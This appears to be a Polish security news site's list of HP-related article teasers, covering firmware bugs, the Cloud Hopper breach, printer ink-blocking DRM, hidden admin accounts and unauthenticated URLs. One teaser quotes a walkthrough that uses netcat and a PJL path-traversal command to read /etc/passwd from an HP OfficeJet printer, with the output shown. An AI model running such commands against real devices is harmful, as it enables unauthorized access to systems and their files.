Tego jeszcze chyba nie grali ;) HP dla wybranych modeli dysków SSD (głównie używane w serwerach) wydał aktualizację firmware. Neglecting to update to SSD Firmware Version HPD8 will result in drive failure and data loss at 32,768 hours of operation and require restoration of data from backup in non-fault tolerance,…
Czytaj dalej »
Agencja Reuters, potwierdziła tą informację w pięciu źródłach: Hackers working on behalf of China’s Ministry of State Security breached the networks of Hewlett Packard Enterprise Co and IBM, then used the access to hack into their clients’ computers. Wg doniesień atakujący byli częścią grupy realizującej kampanię Cloud Hopper (znaną już…
Czytaj dalej »
Zaczęło się od przygotowania przez marketing HP dramatycznego filmu, pokazującego w sugestywnym, pełnym mroku scenariuszu, jak to używanie niebezpiecznej drukarki może skończyć się tragicznie… i puentując całość informacją o produktach HP: ” the world’s most secure printers and PCs”. Zaintrygowało to załogę z FoxGlove Security – to ci sami od…
Czytaj dalej »
Dość dokładny opis rootowania drukarki HP OfficeJet Pro 8210. Rozmowa odbywała się protokołem PJL. Od zwykłego odpytania o nazwę drukarki: albinolobster@ubuntu:~$ nc 192.168.1.159 9100 @PJL INFO ID @PJL INFO ID „HP OfficeJet Pro 8210″ przez Path Traversal: @PJL FSUPLOAD NAME=”../../etc/passwd” OFFSET=0 SIZE=648 @PJL FSUPLOAD FORMAT:BINARY NAME=”../../etc/passwd” OFFSET=0 SIZE=648 root:x:0:0:root:/var/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh…
Czytaj dalej »
Ostatnio opisywaliśmy problem z drukarkami HP, które 13 września odmówiły druku na alternatywnych tuszach. Wszystko dzięki wcześniejszemu, sprytnemu wgraniu… odpowiedniej aktualizacji firmware. Do akcji włączyła się organizacja EFF, która pisze do szefa HP używając dość mocnych tez: HP abused its security update mechanism to trick its customers. (…) HP’s time-delayed anti-feature…
Czytaj dalej »
Trzynastego września 2016 część użytkowników drukarek HP została powitana niemiłym komunikatem: Komunikat pojawiał się w przypadku użycia tzw. zamienników do oficjalnie proponowanych przez HP tuszy drukujących. Błąd pojawił się jednego dnia dużej licznie różnych użytkowników, co wzbudziło podejrzenia, że 13 września został zahardkowany w firmware. Niektórzy piszą wręcz tak: Printer worked fine…
Czytaj dalej »
Razem z firmą HP zapraszamy Was do wzięcia udziału w prostym ale dość urozmaiconym hackme. Mamy tym razem aż 6 nagród: 3 zestawy Raspberry Pi oraz książki.
Czytaj dalej »
Jeden z użytkowników Reddita zauważył przypadkowo, że jego laptop firmy HP transmituje sygnał radiowy stanowiący zapis z wbudowanego mikrofonu…
Czytaj dalej »
Część modeli drukarek sieciowych HP umożliwia zdalne pobranie haseł administracyjnych oraz innych informacji konfiguracyjnych drukarki (łącznie z takimi informacjami jak: WPS PIN – w przypadku drukarek mających interface WiFi). Aby pobrać ww. dane należy użyć specjalnych, „ukrytych” URL-i, które nie wymagają uwierzytelnienia.
Czytaj dalej »
Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract admin password in plaintext – among other information like WiFi settings (including WPS PIN).
Czytaj dalej »
Niedawno informowaliśmy o ukrytym koncie administracyjnym w jednym z systemów storage firmy HP. Tym razem przyszła kolej na systemy StoreVirtual Storage. Jak informuje samo HP, w systemie istnieje konto umożliwiające… zdalny dostęp jako root do systemu operacyjnego (LeftHand) na którym pracuje całe rozwiązanie. Patch prawdopodobnie pojawi się 17 lipca. –ms
Czytaj dalej »
Jak pokazuje pewne odkrycie, wysoka cena urządzenia sieciowego nie zawsze oznacza jego wysokie bezpieczeństwo.
Czytaj dalej »